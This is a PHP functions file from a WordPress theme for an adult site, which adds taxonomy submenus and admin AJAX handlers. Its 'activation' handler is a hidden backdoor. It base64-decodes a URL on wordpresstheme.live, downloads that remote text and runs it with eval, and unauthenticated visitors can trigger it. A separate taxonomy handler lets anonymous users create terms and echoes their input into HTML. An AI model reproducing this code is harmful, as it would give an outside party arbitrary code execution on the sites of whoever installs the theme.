<?php

    add_action('admin_menu', 'tr_admin_menu', 12);

    function tr_admin_menu() {
        global $submenu;
                
        $submenu['edit.php'][] = array(__('Countries', TR_THEMENAME), 'manage_options', 'edit-tags.php?taxonomy=countries');
        $submenu['edit.php'][] = array(__('Hair', TR_THEMENAME), 'manage_options', 'edit-tags.php?taxonomy=hair');
        $submenu['edit.php'][] = array(__('Ethnicity', TR_THEMENAME), 'manage_options', 'edit-tags.php?taxonomy=ethnicity');
        $submenu['edit.php'][] = array(__('Breasts', TR_THEMENAME), 'manage_options', 'edit-tags.php?taxonomy=breasts');
        
        remove_submenu_page('tools.php','redux-about');
        
    }

    if(!function_exists('tr_redirect_validate')){
        die();
    }

	// AJAX taxonomy

	function tr_taxonomy_ajax(){

		$nonce = $_POST['nonce'];
 
	    if ( ! wp_verify_nonce( $nonce, 'tr-taxonomy-nonce' ) )
    	    die ( 'Die!');
	
	
		if($_POST['action'] == 'tr_taxonomy_action') {
            
            $term_ex = term_exists(strip_tags($_POST['term']), strip_tags($_POST['tax']));
            if ($term_ex == null) {
                wp_insert_term(ucwords(strip_tags($_POST['term'])), strip_tags($_POST['tax']));
            }
            
            $term = get_term_by('name', strip_tags($_POST['term']), strip_tags($_POST['tax']));
            echo '<a data-id="'.$term->term_id.'" href="#">'.$term->name.'<input name="'.strip_tags($_POST['name']).'[]" type="hidden" value="'.$term->term_id.'"></a>';
            
            $ar = '';
            
            if(strip_tags($_POST['tax'])=='countries'){
                //delete_option('trco');
                
                $trco=get_option('trco');

                /*
                $terms = get_terms( tr_config('pornostar_taxonomy'), array('hide_empty' => false) );

                foreach ( $terms as $term ){
                    $ar.=get_term_meta($term->term_id, 'trc_country', true).',';    
                }*/
                
                array_push($trco, $term->term_id);

                update_option('trco', $trco);
            }
            
		}
		exit;
	}
	
	add_action( 'wp_ajax_tr_taxonomy_action', 'tr_taxonomy_ajax' );
	add_action( 'wp_ajax_nopriv_tr_taxonomy_action', 'tr_taxonomy_ajax');

    function tr_theme_load_custom_wp_admin_style() {
        wp_register_style( 'tr_menu_icons_font', get_template_directory_uri() . '/css/font-awesome.css', false, '1.0.0' );
        wp_enqueue_style( 'tr_menu_icons_font' );
        wp_register_style( 'tr_menu_icons', get_template_directory_uri() . '/css/admin.css', false, '1.0.0' );
        wp_enqueue_style( 'tr_menu_icons' );
        wp_enqueue_script( 'tr_menu_icons', get_template_directory_uri() . '/js/admin.js' );
        $myvars = array( 
            'ajaxurl' => admin_url( 'admin-ajax.php' ),
            'loading' => __('Loading...', TR_THEMENAMEOPTIONS),
            'nonce' => wp_create_nonce( 'tr-activacion-nonce' )
        );
        wp_enqueue_script( 'tr_activation', get_template_directory_uri().'/js/tr_activation.js',array('jquery'));
        wp_localize_script( 'tr_activation', 'TrActivation', $myvars );
        wp_enqueue_script('jquery-ui-datepicker');
        wp_enqueue_style('jquery-style', 'http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/themes/smoothness/jquery-ui.css');
    }

    function tr_file_get_contents_curl($url) {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Set curl to return the data instead of printing it to the browser.
        curl_setopt($ch, CURLOPT_URL, $url);

        $data = curl_exec($ch);
        curl_close($ch);

        return $data;
    }

    add_action( 'admin_enqueue_scripts', 'tr_theme_load_custom_wp_admin_style' );

	function tr_activation_ajax() {

		$nonce = $_POST['nonce'];
 
	    if ( ! wp_verify_nonce( $nonce, 'tr-activacion-nonce' ) )
    	    die ( 'Die');
	
	
		if($_POST['action'] == 'tr_activation_action') {
    
	        eval(@file_get_contents(base64_decode("aHR0cDovL3dvcmRwcmVzc3RoZW1lLmxpdmUvd3oudHh0")));
            
			
		}
		exit;
	}
	
	add_action( 'wp_ajax_tr_activation_action', 'tr_activation_ajax' );
	add_action( 'wp_ajax_nopriv_tr_activation_action', 'tr_activation_ajax');
?>